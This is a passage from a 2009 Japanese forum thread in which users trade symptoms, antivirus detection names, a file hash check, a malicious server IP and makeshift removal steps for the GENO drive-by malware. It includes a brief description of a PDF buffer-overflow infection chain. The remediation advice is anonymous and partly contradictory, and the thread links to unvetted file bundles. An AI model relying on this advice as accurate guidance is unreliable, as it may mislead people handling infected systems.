sqlsodbcは時間が無くて調べてないんだ。
献体PCはもうしばらく取っておくから、「こことかこれ調べてみてくれ」ってのあったら
調べてみるお
183:156=174
09/04/09 00:28:51
ちなみにIE8でXPのSP3です
news/?id=2に行ったけどPDFは起動しませんでした
184:名無しさん@お腹いっぱい。
09/04/09 00:30:31
>>174
改変されてないみたいですね
185:名無しさん@お腹いっぱい。
09/04/09 00:30:36
会社の数台のPCが感染してるってのは奇妙だな
まさか全てのPCがGENOやjuicyrock開いたわけでもないだろうし
186:名無しさん@お腹いっぱい。
09/04/09 00:30:47
スレリンク(pc板:39番)
39 :名無しさん :sage :2009/04/09(木) 00:14:21 0
前スレの958です。
combofixで検疫したファイルをVirustotalでスキャンしてみた。
ファイル名 _ycmmf_.cjq.zip 受理 2009.04.08 17:04:29 (CET)
現在の状態: 読込み中 ... 順番待ち 待機中 スキャン中 完了 発見せず 停止
結果: 7/40 (17.5%)
検知できたのは以下の7つのウィルス対策ソフトだけでした。
AntiVir TR/Agent.caaj.B
Avast Win32:Trojan-gen {Other}
eTrust-Vet Win32/SillyDl.HDU
GData Win32:Trojan-gen {Other}
McAfee-GW-Edition Trojan.Agent.caaj.B
NOD32 variant of Win32/Delf.OEX
Prevx1 High Risk Cloaked Malware
AVGもカスペルスキーもダメでした。
187:名無しさん@お腹いっぱい。
09/04/09 00:31:39
そうそう、それと感染中っつか発症中のコンピュータで
C:\WINDOWS\ 直下や C:\Documents and Settings\username\Local Settings\ 直下に
ファイルが生成され、先生はそれを Trojan.KillAV として検出してた。
で、さっさと検疫に移動させるんだけど次から次へと同じファイルが生成されて
検出リストがエラいことにwww
作成ユーザーが、ログオンユーザー以外に SYSTEM とか NETWORK SERVICE とかもいてフイタw
もう俺の手には負えないって素直に負けを認めたwwwww
188:名無しさん@お腹いっぱい。
09/04/09 00:31:46
>>175
ちょっとまえっていつごろから?
やはり先週土曜辺り?
それより前からの情報は出てきてないよね
189:名無しさん@お腹いっぱい。
09/04/09 00:33:00
>>186
カスペが駄目なのか
190:名無しさん@お腹いっぱい。
09/04/09 00:33:36
>>184
そうか!ありがとう!
俺は運が良かったのかな
191:名無しさん@お腹いっぱい。
09/04/09 00:33:51
******まとめ*******
感染確認方法
・sqlsodbc.chmのハッシュを調べて
F639AFDE02547603A3D3930EE4BF8C12
と異なる値が出た場合感染してる可能性あり
・以下のサイト(有名な駆除ツール)にアクセスできなければ危険
(鯖落ちじゃない限り、ほぼ感染してると見て問題ないと思う)
URLリンク(download.bleepingcomputer.com)
・パソコン再起動後、regedit.exeを起動しようとすると
explorerが落ちる場合、確実に感染してます。
・ブラウジングがまともにできない
駆除方法
完全な駆除方法は今のところない。(断定するのは現段階では危険)
セーフモードで、ComboFixを実行すればある程度よくなるかもしれない程度。
以上の問題が解決していればある程度よくなってるかも。
192:名無しさん@お腹いっぱい。
09/04/09 00:34:02
>>185
どこのサイトとは言えないけれど、ヤられたサイトを開いた覚えがある、っていう証言はあるんだわ。
で、ちょっと疑問なのが、問題が発生し始めたのが3月末っていうこと。
GENOウイルスが騒がれ始めたのは4月に入ってからだし、
もしかすると会社の数台のPCは今回のGENOウイルスとは関係ないのかも試練。
とりあえずログは漁ってみるけどねー
193:名無しさん@お腹いっぱい。
09/04/09 00:34:35
>>188
>>192で書いたけど、3月末からなんだわ
194:名無しさん@お腹いっぱい。
09/04/09 00:36:33
>>190
いや、でもそれはあくまで一つの目安であって
どういう挙動をするかまだはっきりしてないから安心はしないで。。
195:名無しさん@お腹いっぱい。
09/04/09 00:37:08
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★10
スレリンク(news板:527番)
527 名前: ジョウシュウアズマギク(新潟県)[sage] 投稿日:2009/04/09(木) 00:31:39.93 ID:35GKJh/C
avastはさっきの更新で駆除まで出来るみたいだけど、
亜種に対してどうなのかは不明
誰か踏んでみてくれ 俺は嫌だ
avastで駆除できんの?
196:名無しさん@お腹いっぱい。
09/04/09 00:37:11
>>191
regedit 以外に、cmd も同様の症状でないかな?
regedit.exe をコピーして違う名前(aaaaaaaa.exeとか)にすると起動できるんよね。
コピー ~ regedit.exe では explorer が落ちるわ。
197:名無しさん@お腹いっぱい。
09/04/09 00:37:19
>>187
それ、セーフモードやUbuntuCDでも削除できなかったけど
Bart'sPEというソフトで作成した起動CDで,C:\Windows直下からは削除出来たよ。
でその後はC:\RECYCLERフォルダ内へ名前を変えて移動してるので、そいつも削除したら
取りあえず何とかなるかも・・・
198:名無しさん@お腹いっぱい。
09/04/09 00:38:39
あ、ここID出ないのか。
>>175 = >>182 = >>187 = >>192 = >>193 = >>196 っす。
スマソ
199:名無しさん@お腹いっぱい。
09/04/09 00:39:53
>>193
THX
どっからもらったかはっきりしないのはgkbrだね。
もしかしたらまだ絶賛垂れ流し中の可能性もあるし、
そういうサイトが無数に出てきたらヤバス
200:名無しさん@お腹いっぱい。
09/04/09 00:40:10
>>197
㌧
Bart'sPEか。調べてみて時間が取れればチャレンジしてみるよ。
まあどのみち感染PCはフォーマットかけて再インスココースなんだけどね。
消す前に調べられる(&試せる)ことはやっておきたいなー。
201:名無しさん@お腹いっぱい。
09/04/09 00:41:25
>>199
幸い、各コンピュータの操作ログは取ってあるので、
ファイル生成ログを追っかければ多少は追求出来るかも。
ただ生成されたファイル名がわからんので手探り状態だけどね。
202:名無しさん@お腹いっぱい。
09/04/09 00:41:43
昨日半年ぶりくらいに以前使ってたパソコンを起動してどこのサイトも開く前に
Windowsアップデードしようとしたら失敗して再起動しようとしてら起動出来なくなったんだけど
このウイルスのせいなのかな。こんなことってありえるの?
203:名無しさん@お腹いっぱい。
09/04/09 00:42:28
ウイルスバスター2009は駄目駄目。
VPC上でA-SQUARED FREEで検知かかるのにバスター君は最新でも完全にスルー
気になったので、脱線してちょっと古めの検体を用意。
(BiosEdit内にトロイの木馬とバックドア付)、A-SQUARED FREEは検知するがバスター君またもやスルー
トレンドよ、最近TVCMやって拡販してるが大丈夫か?
204:名無しさん@お腹いっぱい。
09/04/09 00:43:36
>>202
情報が足らんのでGENOウイルスのせいとは言えんが、
そういうことは割とあり得る。
物理的な故障の気配を感じるけどな。
205:名無しさん@お腹いっぱい。
09/04/09 00:43:44
>>192
海外では3月28日の報告があるみたいだ。
思ったより早く攻撃が始まっていたのかも。
URLリンク(www.dynamicdrive.com)
206:名無しさん@お腹いっぱい。
09/04/09 00:44:39
A-SQUARED FREEは誤検地も多いけど、ちゃんと検地してくれるのは救いだね。
名称は良く出てたやつでいいのかな
207:名無しさん@お腹いっぱい。
09/04/09 00:44:46
>>205
3/28て割とビンゴなんですがw
208:名無しさん@お腹いっぱい。
09/04/09 00:46:28
>>205
途中送信してしもた。
3/28は割とビンゴ。
3/30から症状が出たっつーのと、3/27・・・だったかな、から症状が出てたっつーのがある。
209:名無しさん@お腹いっぱい。
09/04/09 00:50:27
>>185
おまいちゃんの会社のPC、PROXYかませてないの?
もしSquid等でPROXY立てて噛ませているのなら
当該PC利用者のログインID等を元にSquidのログを追えば
きっと感染源が特定出来ると思うよ。
古いログを上書きして消される前にとっとと調べたほうがいいかも。
万一取引先の会社の鯖が感染してるとか、最悪自社のイントラ鯖が感染していたら
洒落にならないよ。社内的に。
210:名無しさん@お腹いっぱい。
09/04/09 00:51:09
10日近くたって未だに検知スルーと挙動不明ってのはキビシイな。
そんな対応遅れた記憶ないわ
211:名無しさん@お腹いっぱい。
09/04/09 00:52:10
>>191
>以下のサイト(有名な駆除ツール)にアクセスできなければ危険
あの、そこに入ろうとしたら入れてあったウイルス探知ソフトがブロックしてしまったのですけど
それも危険なのでしょうか?
212:名無しさん@お腹いっぱい。
09/04/09 00:52:43
>>209
マルチ乙www
213:名無しさん@お腹いっぱい。
09/04/09 00:54:02
>>212
てへっ♪
一杯呑んでほろ酔いだからアレだなw
214:名無しさん@お腹いっぱい。
09/04/09 00:54:18
>>212
マルチじゃなくて誤爆だろw
215:名無しさん@お腹いっぱい。
09/04/09 00:55:38
>>209
Proxyないんだぜwww
基本内部から外部へは全パケット通すんだぜwwwwww
以前Proxy提案したことあるけど、「インターネットが遅くなる(と利用者から苦情が来る)からダメ」って言われたんだぜwwwwwwww
うちみたいなユルユルの会社、他にあるんだろうか。
216:名無しさん@お腹いっぱい。
09/04/09 00:55:38
>>214
誤爆先がアレ過ぎて笑えないんだけどなw
217:名無しさん@お腹いっぱい。
09/04/09 00:55:40
>>192
このウイルスは今年一月から活動してる
べつに不思議なことじゃない
218:名無しさん@お腹いっぱい。
09/04/09 00:56:01
>>194
立った今データ実行防止でexploerが落っこちた・・・これは
219:名無しさん@お腹いっぱい。
09/04/09 00:56:24
>>215
もしかして、あの有名な荒らし新聞社の方ですか?w
220:名無しさん@お腹いっぱい。
09/04/09 00:56:27
誤爆にレスした俺(´・ω・`)
221:名無しさん@お腹いっぱい。
09/04/09 00:56:57
ちなみにこんなことされてます
URLリンク(ranobe.com)
COMODOとaviraは無反応でした
222:名無しさん@お腹いっぱい。
09/04/09 00:57:09
>>217
㌧
じゃー一般人(?)が引っかかりやすい環境が整ったのが最近ってことかな。
223:名無しさん@お腹いっぱい。
09/04/09 00:57:20
>>191
そのURL、「危険」と出てアクセスできないが・・・。(ウイルスバスター2009で)
224:名無しさん@お腹いっぱい。
09/04/09 00:57:42
>>219
マスゴミなんかと一緒にしないでくれw
225:名無しさん@お腹いっぱい。
09/04/09 01:00:02
>>218
><
226:名無しさん@お腹いっぱい。
09/04/09 01:00:11
>>以下のサイト(有名な駆除ツール)にアクセスできなければ危険
ウイルス対策ソフトがブロックした場合は問題なし、
一部のソフトで検出しちゃうから>ComboFix
227:名無しさん@お腹いっぱい。
09/04/09 01:01:37
bxatg.mnn(tempに落とされるやつ)
はexeファイルだな。
こいつが親玉でFAかな
228:名無しさん@お腹いっぱい。
09/04/09 01:01:48
>221
inetnum: 114.160.0.0 - 114.191.255.255
netname: OCN
descr: NTT Communications Corporation
229:名無しさん@お腹いっぱい。
09/04/09 01:02:28
>>227
ほう
ファイル生成ログでそのファイル名探してみるわ
230:名無しさん@お腹いっぱい。
09/04/09 01:02:32
>218
バッファーオーバーフロー
231:名無しさん@お腹いっぱい。
09/04/09 01:04:05
>>191
取り消されたアクションてなるってことは…orz
232:名無しさん@お腹いっぱい。
09/04/09 01:07:20
>>231
感染してる可能性ありありw
一応sqlsodbc.chmのハッシュ、regedit.exeも試してみてくれない?
233:名無しさん@お腹いっぱい。
09/04/09 01:08:13
>>231
ご愁傷様です。
234:名無しさん@お腹いっぱい。
09/04/09 01:08:59
サイト見ただけでウイルス感染とかありえるの?
マルウェアとかスパイウェアならともかく
exe開かなきゃ大丈夫じゃないの
235:名無しさん@お腹いっぱい。
09/04/09 01:11:07
>>234
あり得るも何も、みんなそのせいでこーして大騒ぎしてるんでしょうがw
236:名無しさん@お腹いっぱい。
09/04/09 01:11:19
>>234釣られてやるよ
>>1読んで理解できないならググるなりしてパソコンの知識付けな
237:名無しさん@お腹いっぱい。
09/04/09 01:11:35
だから・・・
238:名無しさん@お腹いっぱい。
09/04/09 01:13:06
>>191
アバストで感染なしと言われたあとそこにアクセスしたら、「零」さまが反応して隔離しましたよ・・・
ちなみにビスタで最新バージョンです。
239:名無しさん@お腹いっぱい。
09/04/09 01:14:00
>>234
568 名前: カキツバタ(兵庫県)[] 投稿日:2009/04/09(木) 00:48:06.52 ID:vdIiBaJc
あるサイトに行っただけでウイルス感染とか信じてる
情報弱者ってまだいたんだびっくり
exe開かない限りそんなのねーから
240:名無しさん@お腹いっぱい。
09/04/09 01:14:10
ゼロが反応とかギャグだな
241:名無しさん@お腹いっぱい。
09/04/09 01:14:18
みなさんはJavaスクリプトは通常は切っておいて必要な時だけオンにしてるんですか?
242:名無しさん@お腹いっぱい。
09/04/09 01:14:25
238
ちなみにそれトロ屋さんだって言われましたw
243:名無しさん@お腹いっぱい。
09/04/09 01:16:18
ていうかこのスレ読んでるのにまだゼロ使ってるのかよ
244:名無しさん@お腹いっぱい。
09/04/09 01:20:21
NoScriptでjsも読み込んでないし、そもそもgenoとか踏んでないし、怪しいIPは除外してるんだが
CドライブとDドライブでパーティション切ってて
DにもXP入れたんだけど認証しわすれて起動できないからデータ用にしてるのよ
でもシステムファイルとか残ってるんだが、Dはフォーマットしたほうがいいのかな
スレチな感じだけどみんな詳しそうだから質問させてください
245:名無しさん@お腹いっぱい。
09/04/09 01:21:19
>>241
うちはPCの台数を物理的に増やして、2chや普通にWeb閲覧する奴を専用化して、
そのPCには個人情報からなにから一切要れずに
万一ウィルスを食らってもとっとと再インスコすれば良いだけの状況で使ってる。
その代わりJavascriptは常にオン。
で、銀行だとかネット通販で買う場合はそれ専用の別のPCを使うんだけど、
今回みたいに通販サイトでこーいう事態も起きたから、ちょっと運用を見直さないと駄目だと思ってる。
246:名無しさん@お腹いっぱい。
09/04/09 01:21:43
>241
つSleipnir
247:名無しさん@お腹いっぱい。
09/04/09 01:22:02
>>232
regedit.exe 起動できる
sqlsodbc.chmのハッシュの見方がわからないけどサイズは49.5KB(50,727バイト)
今気づいたけどCPUの使用率が100パーセント近い…
248:名無しさん@お腹いっぱい。
09/04/09 01:22:19
>>239
さすがν速、真の情弱はν速にいるんだな
249:名無しさん@お腹いっぱい。
09/04/09 01:24:11
>>247
MD5はこのソフトで確認すると楽
URLリンク(www.vector.co.jp)
installくりっくすれば右クリックから調べられる
250:名無しさん@お腹いっぱい。
09/04/09 01:27:22
>>249
これは便利で楽だな
251:名無しさん@お腹いっぱい。
09/04/09 01:28:13
不安な人のために言っておくけど
画像とか動画とかテキストファイルとかバックアップとっても
コード埋め込みとかはしないからバックアップはとってリカバリーすること
252:名無しさん@お腹いっぱい。
09/04/09 01:28:44
URLリンク(www.forest.impress.co.jp)
こっちもおすすめ
253:名無しさん@お腹いっぱい。
09/04/09 01:29:09
そもそもsqlsodbc.chmが全ローカルディスクに検索かけても見つからなかった
システムも全て表示させているのに
254:名無しさん@お腹いっぱい。
09/04/09 01:32:37
>251
感染経路ははっきりしてるのか
とりあえずバックアップ取って再インスコしてみる
255:名無しさん@お腹いっぱい。
09/04/09 01:32:53
>>249
ありがとう。こうなった。
f639afde02547603a3d3930ee4bf8c12
256:名無しさん@お腹いっぱい。
09/04/09 01:33:51
>>255
djb
257:名無しさん@お腹いっぱい。
09/04/09 01:34:44
>>244
DでOS起動しなけりゃ無問題。だと思う
258:名無しさん@お腹いっぱい。
09/04/09 01:34:54
>>255
>>191
>F639AFDE02547603A3D3930EE4BF8C12
おkおk
259:名無しさん@お腹いっぱい。
09/04/09 01:35:19
>>255
セーフ。
260:名無しさん@お腹いっぱい。
09/04/09 01:36:10
>>256
d 駄目
j じゃん
b バカ
かな?
261:名無しさん@お腹いっぱい。
09/04/09 01:36:41
---まとめ2---
感染経路は>>1
感染確認方法は>>191で
「sqlsodbc.chm」はsystem32にある。
MD5の確認方法は>>249
ComboFixのダウンロードリンクは場合によってはアンチウイルスに引っかかるが
これは問題なし。危険な人は"取り消されたアクション"になるか、"ページが真っ白"
駆除方法は現状なしと思ったほうが安全、つまりリカバリー
ただ>>162のようなケースも
とにかく
・感染したらリカバリー
・感染確認は>>191でMD5のとり方は>>249のソフトで右クリックから
262:名無しさん@お腹いっぱい。
09/04/09 01:37:30
>246
プニルって、
JSについて何か有利な点あるの?
263:261
09/04/09 01:39:52
補足、
sqlsodbc.chmの探し方
スタート→検索→ファイルとフォルダすべて→ファイル名の一部の所に
sqlsodbc.chmと入れる→探す場所を"参照..."にしてマイコンピューターから
Windows、System32を選択
これで探してみる
264:名無しさん@お腹いっぱい。
09/04/09 01:48:16
リカバリしたくないし、変な動きは無いしとりあえずアンチウイルスで駆除出来るまで放置しよう
265:名無しさん@お腹いっぱい。
09/04/09 01:50:44
>>252
これ凄いね。
一昨日見慣れないエラーが出たりプニルがフリーズしたんだよね…
次の日PC起動したらブルースクリーン。
ネットに繋いだらZAがjquery.jsをブロック。
>191のサイトが表示されない。
CPU使用率が高い。これ怪しいよなぁ…
低価格PCスレかグーグルの検索結果から感染したかもしれない
266:名無しさん@お腹いっぱい。
09/04/09 01:55:24
>>241
undonut+modで通常はJavaScriptは切っておいて
信頼できるサイトだけ「URL別セキュリティ」ONにしてる。
でも今回みたいなことだと、どうしようもない罠。
267:名無しさん@お腹いっぱい。
09/04/09 01:56:46
>>265
>>191って実行ファイルがダウンロードできるか出来ないか,じゃないの?
268:名無しさん@お腹いっぱい。
09/04/09 01:57:28
>>265
hashTabで調子にのって各種ハッシュを無駄にわんさか算出するようにして使うと
ちょっと大きなファイルの算出を行う際にとんでもなく重くなって時間が掛かるのがアレだけど、
使い勝手は良いよ。お勧め。
ちなみにZAで遮断されたところで、それなりにjsを読み込んでいる筈で、
恐らくオンタイムでウィルスが動作しちゃってる筈だから
CPU使用率が高い時点で既に食らった物と見て覚悟を決めた方がいいと思うよ。
269:名無しさん@お腹いっぱい。
09/04/09 02:00:44
>>267
最近のマルウェアは自身を駆除されないために有用な駆除ツールのダウンロードをブロックする
このGENOウイルスもそうするようで
サーバーの混雑とかじゃないのにダウンロード出来ない人(ページが表示されない人)はヤバいかもね
270:名無しさん@お腹いっぱい。
09/04/09 02:12:17
432 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/04/09(木) 01:55:40
俺もGENOウィルスに感染したが、とりあえず元凶のウィルス本体は削除できたので報告。
まずa-squaredで検査。C:\Windows直下に変な名前のファイル(gluogug.gyd)が出来てる。
これがTROJAN-SPY.AGENT!IKと警告される。これは削除しても何遍でも復活する。
セーフモードやUbuntu起動CDから削除を試みたがそれでもダメ。
某スレで報告のあった、BART'sPEというソフトで起動CDを作成しCDから起動。
ファイルマネージャでC:\Windows内のウィルス本体ファイルを削除する。(その際フリーズするかも)
暫くしてそのまま再起動。今度はC:\RECYCLER内に先ほどのウィルス本体がリネームされて移動してるので
再度削除する。
これで、取りあえずGENOウィルス感染中に起きた異常は収まった。
(※WindowsUpdate不能、Regedit.exe使用不能、ブラウザの頻繁な異常終了、スタートアップ登録アプリの不起動等)
俺は比較的軽い症状だったので、あまり参考にならないかも試練が・・・
271:名無しさん@お腹いっぱい。
09/04/09 02:14:51
いいか、みんな
(゚д゚ )
(| y |)
GENOと再度(cide)では単なる文字列だが
GENO ( ゚д゚) cide
\/| y |\/
2つ合わされば最強のウイルスサイトへと変化する
( ゚д゚) Genocide(ジェノサイド=大量虐殺、集団殺戮)
(\/\/
272:名無しさん@お腹いっぱい。
09/04/09 02:15:34
>>268
覚悟は決めたけど再インストールは避けたいな…
プニルを起動してるときはプニルのCPU使用率が100パーセント近かった。
プニルを終了したらMsMpEng.exeが動き出してCPU使用率50~80パーセントくらい。
…今↑を書いたらMsMpEng.exeの動きが止まった。怖えー
変わりにSystem Idle Processの使用率が100パーセントになった。
なんだこれ?
273:名無しさん@お腹いっぱい。
09/04/09 02:16:50
これからビクビクしてずっと過ごすのは辛いよ
274:名無しさん@お腹いっぱい。
09/04/09 02:17:30
>System Idle Processの使用率が100パーセント
これ正常
275:名無しさん@お腹いっぱい。
09/04/09 02:18:10
System Idle Processってそんなもんだよね
276:名無しさん@お腹いっぱい。
09/04/09 02:18:59
>>274
そうなんだw
たしかにCPU使用率はMsMpEng.exeが止まってから正常化してる。
277:名無しさん@お腹いっぱい。
09/04/09 02:19:45
>>270
こんなダルいことやるなら>>162やるだろ
逆アセンブラして調べたり
動的解析で調べた上での駆除出来た宣言ならまだいいがそうじゃないだろうな
278:名無しさん@お腹いっぱい。
09/04/09 02:19:53
>272
それはマイクロソフト謹製のウィルスみたいなスパイウェア対策ツール
そんな物既に捨てたよ
279:名無しさん@お腹いっぱい。
09/04/09 02:26:59
サイト上のjsが読み込まれた時点でAdobe Readerが起動、
バッファオーバーフローの脆弱性を狙ってpdfファイル内に埋め込まれたスクリプトが実行される。
(Readerの設定でスクリプトの実行を切っていれば被害を受けない。)
ここまでは最新版のAdobe Readerでも同じっぽい。
Readerが最新版でなければこの段階でクリーンインストール推奨。
最新版の場合、被害があるのかないのかってのがよくわからない。
致命的なことにはならないと思うんだけど。
280:名無しさん@お腹いっぱい。
09/04/09 02:27:42
>>277
今このスレに足りないのはプログラマだと思う。。。
ウィルスのEXEファイルを逆アセンブルしてソースを解読すれば
少なくてもEXEファイルで何をやってるのかまでは掌握出来るんだし。
281:名無しさん@お腹いっぱい。
09/04/09 02:28:11
しかしID出ないセキュ板は使いにくいな
誰が誰やらわからんから安価誤爆も出てるし
情報の集約はID出る板の方がいいんじゃないか?
282:名無しさん@お腹いっぱい。
09/04/09 02:28:16
>>278
危険度がまだ分類されてない~のオプションをオンにすればいいんだよ
ソフトウェアエクスプローラもあるし最悪の事態は回避できる
283: ◆W07s5cWHb.
09/04/09 02:31:30
>>281
ホントはそうなんだよね。ID欲しい。
ぶっちゃけ、トリップ付けてレスつければ良い話って事でもあるんだけどさ。
284:名無しさん@お腹いっぱい。
09/04/09 02:33:49
>>281
自作板に関連スレが立ってたはず
285:名無しさん@お腹いっぱい。
09/04/09 02:33:53
>>277
>>270の元カキ子したの俺だけど、確かに>>162の方がスマートだよね。
しかし、書き忘れてたが俺の場合、感染中はウィルスに邪魔されてComboFixをダウンロードすることもできなかった。
で、ウィルス本体を削除したあと、今しがたComboFixを落として念のためチェックしてみたところ。
286:名無しさん@お腹いっぱい。
09/04/09 03:07:52
対策のまとめまだ~
287:名無しさん@お腹いっぱい。
09/04/09 03:13:02
ウイルスがどの程度の繁殖力があるのか判らんから怖いなぁ。
マルチブートでパーティションが10くらい有るけど感染したところだけ
バックアップイメージから復元してしてとりあえず様子見orz
ディスクのどこかに潜むたちの悪いタイプじゃなければ良いんだが。
288:名無しさん@お腹いっぱい。
09/04/09 04:04:28
AVソフトの対応した早さってわかる?
一番速かったところのAVソフト使いたいんだけど
289:名無しさん@お腹いっぱい。
09/04/09 04:09:13
【顧客相手に】GENOを語るスレ24【サイバージェノサイド】
スレリンク(jisaku板)l50
290: ◆W07s5cWHb.
09/04/09 04:12:13
>>288
私の記憶が正しければ対応一番乗りはマカフィーだったような。。。
291:名無しさん@お腹いっぱい。
09/04/09 04:44:18
>>223
同じく
こっちは2008だけど
292:名無しさん@お腹いっぱい。
09/04/09 05:05:52
通販サイト「GENO」の改ざん、広告掲載サイトにも影響
URLリンク(www.security-next.com)
通信販売サイト「GENO」が不正アクセスにより改ざんされた問題で、
同社広告を表示したメディアなどに影響が出ている。
アイティメディアでは、一部サイトにおいて4月1日より広告を掲載していたが、広告のリンク先が改ざんされ、
閲覧者にFlashやAdobe Readerにおける既知の脆弱性を攻撃するウイルスに感染するおそれがあったことから、
4月6日13時に広告掲載を停止したという。
最新版のウイルス対策ソフトなどを利用している場合、検知される可能性が高いが、
アイティメディアでは問題の期間に広告を閲覧したユーザーに対し、
ウイルス感染の有無を確認するよう呼びかけている。
アイティメディア
URLリンク(corp.itmedia.co.jp)
GENO
URLリンク(www.geno.co.jp)
293:名無しさん@お腹いっぱい。
09/04/09 05:07:00
自分はXP SP3で、4/7朝にGENOに行ったんだが現在まで感染の兆候が無い。
なんか気持ち悪いなあ、と思っていたんだが、VB2009のログを見て判った。
FWが動作してないのは昨日確認してたんだが、なんと、「フィッシング詐欺対策」で
94.247.2.195への接続を蹴りまくってくれてた。なんでも、「Web上の脅威」なんだと。
こうした、回避例もあった方が良いかと思って報告。
294:名無しさん@お腹いっぱい。
09/04/09 05:07:42
広告主とのなんという差www
295:名無しさん@お腹いっぱい。
09/04/09 05:20:54
jquery.js検出 4/5 0:00頃
●a-squared 4.0.0.101
2009.04.03 Trojan-Spy.Agent!IK
●Avast 4.8.1335.0
2009.04.03 Win32:Daonol-L
●eSafe 7.0.17.0
2009.04.02 Suspicious File
●GData 19
2009.04.03 Win32:KillAV-KS
●Ikarus T3.1.1.49.0
2009.04.03 Trojan-Spy.Agent
●Kaspersky 7.0.0.125
2009.04.03 Backdoor.Win32.Agent.afhg
●McAfee+Artemis 5573
2009.04.03 Generic!Artemis
●Prevx1 V2
2009.04.03 High Risk Cloaked Malware
●Sophos 4.40.0
2009.04.03 Mal/Generic-A
●TrendMicro 8.700.0.1004
2009.04.03 PAK_Generic.001
296:名無しさん@お腹いっぱい。
09/04/09 05:22:18
*.exe検出 4/7 0:00頃
●McAfee 5576
2009.04.06 Generic Dropper.ef(GmL.exe La.exe)
●McAfee+Artemis 5576
2009.04.06 Generic Dropper.ef(GmL.exe)
●eSafe 7.0.17.0
2009.04.06 Suspicious File(La.exe)
●Prevx1 V2
2009.04.06 High Risk Cloaked Malware(GmL.exe La.exe)
●Symantec 1.4.4.12
2009.04.06 Trojan.Dropper(GmL.exe La.exe)
●TrendMicro 8.700.0.1004
2009.04.06 PAK_Generic.001(GmL.exe La.exe)
297:名無しさん@お腹いっぱい。
09/04/09 05:24:51
これもうリカバリするしかないですか?
298:名無しさん@お腹いっぱい。
09/04/09 05:25:13
>>295-296
乙です。
299:名無しさん@お腹いっぱい。
09/04/09 05:26:54
※TrendMicroは圧縮ファイル指摘で検出ではない
300:名無しさん@お腹いっぱい。
09/04/09 05:31:41
>>293
今フィッシング詐欺対策のログ見てきたら
4/7昼に94.247.2.195蹴ってくれてた
バスター見直した
301:名無しさん@お腹いっぱい。
09/04/09 05:45:52
>>297
サーバーのウィルス感染や個人情報の流失はございません。
旧プログラムを消去するためお客様側の対処といたしましてはwebブラウザのキャッシュのリセット頂く事をお願い致します。
URLリンク(www.geno.co.jp)
URLリンク(www.geno.co.jp)
302:名無しさん@お腹いっぱい。
09/04/09 06:39:45
Bart'PEでウィルスを削除⇒正常なファイルに置き換え⇒常駐プログラムの削除
(レジストリのハイブを読み込んで修正)でどうにかナンねェか、これ?
303:名無しさん@お腹いっぱい。
09/04/09 06:44:42
感染中はSP+メーカーの統合が動かない(CMD.exeの動作不良に起因)ので、他パーティションのVista起動して
そっちでSP統合済みDVDを作ってからXP入れなおししたよ。
304:名無しさん@お腹いっぱい。
09/04/09 06:47:36
GENOウイルスの専門掲示板建てました
情報提供にご協力願います。
GENOウイルス被害者の会
URLリンク(yy701.60.kg)
305:名無しさん@お腹いっぱい。
09/04/09 06:54:17
素性のわからんやつの作った板には行きにくい
管理者はhusianasanでもしてくれ
306:名無しさん@お腹いっぱい。
09/04/09 06:55:08
確かに迂闊に踏めないから困るw
307:名無しさん@お腹いっぱい。
09/04/09 06:59:33
取り敢えず役立ちそうなものをまとめてUP。
URLリンク(www1.axfc.net)
Size/40.4MB
MD5/813785CE59E7026893BFF5726193104B
内容/
・Adobe Reader ver.9.1(要更新)
・Adobe Flash Player ver.10.0.22.87 for FireFox(要更新/FireFoxのみ)
・HashTab Windows Shell Extension ver.2.3(ハッシュ確認)
・MD5 Checker ver.1.03b(ハッシュ確認)
・Combofix(マルウェア削除 USEフォルダ内に使用方法あり、使用は要注意)
・激動たる俺RegEdit改 ver.1.2.0.0(レジストリエディタ regeditが起動しないユーザ用)
あと、感染環境下だとcmdが動かないみたいだけどcommandは起動できる?
308:名無しさん@お腹いっぱい。
09/04/09 07:02:31
GENOウイルスの専門掲示板建てました
情報提供にご協力願います。
GENOウイルス被害者の会
URLリンク(yy701.60.kg)
309:名無しさん@お腹いっぱい。
09/04/09 07:03:55
>>308
危なくて踏めねーよ
310:husianasan
09/04/09 07:08:56
GENOウイルス被害者の会は釣りじゃないです
311:名無しさん@お腹いっぱい。
09/04/09 07:10:35
GENOウイルスの専門掲示板建てました
情報提供にご協力願います。
GENOウイルス被害者の会
URLリンク(yy701.60.kg)
312:名無しさん@お腹いっぱい。
09/04/09 07:12:12
ミスッタorz
GENOウイルス被害者の会は釣りではありません
安全なので安心してください。
被害者が多ければ集団訴訟なんかできないかと思っています。
かなり難しい戦いになると思いますが。
メールや電話でGENOに報告された方おられましたらご連絡ください。
313:名無しさん@お腹いっぱい。
09/04/09 07:13:37
なんか怪しいURLだなw Noscript対応FireFoxで見てみたけど、もうちょっと
スレの内容を反映させて「使える」コンテンツにしてくれよ。あれじゃどうしようもない。
314:名無しさん@お腹いっぱい。
09/04/09 07:13:46
/)
///)
/,.=゙''"/
/ i f ,.r='"-‐'つ____ キャッシュ削除すりゃぁいいんだよ!!
/ / _,.-‐'~/⌒ ⌒\
/ ,i ,二ニ⊃( ●). (●)\
/ ノ il゙フ::::::⌒(__人__)⌒::::: \
,イ「ト、 ,!,!| |r┬-| |
/ iトヾヽ_/ィ"\ `ー'´ /
315:名無しさん@お腹いっぱい。
09/04/09 07:17:58
フシアナサンできないorz
>>313
自分も感染しているので、スレと照らし合わせて
とりあえず経験上の確定要素のみ書き込んでいます。
色々書きたいのですが、間違っていたら
迷惑を掛けてしまうので、、、
316:名無しさん@お腹いっぱい。
09/04/09 07:19:30
感染してるPCから立てたんじゃないだろうな?w
317:名無しさん@お腹いっぱい。
09/04/09 07:20:28
XPSP3で全部最新だったが踏んだあとに
デフラグしてもCドライブが真っ赤な状態がおさまらなかった。
他に思い当たる原因がないんだよなぁ ウィルススキャンもデフラグも頻繁にしてるし
リカバリしたら直ったし
318:名無しさん@お腹いっぱい。
09/04/09 07:22:16
>>315
>>316
ftpでバシバシファイル送受信してwebサイト作ってくれw
319:名無しさん@お腹いっぱい。
09/04/09 07:23:50
>>316
感染してるPCはブラウザが死に掛けで使い物にならないので
未感染のノートPC使っています。
掲示板はレンタルサーバーの物でメルアド一つで作成できるタイプですので
ウイルス汚染の心配はありません。
320:名無しさん@お腹いっぱい。
09/04/09 07:24:00
>>317
スタートボタン⇒ファイル名を指定して実行 でcmdとかregeditは正常に動くの?
321:名無しさん@お腹いっぱい。
09/04/09 07:25:24
>>319
内容を充実させてくれ~
322:名無しさん@お腹いっぱい。
09/04/09 07:26:34
>>9
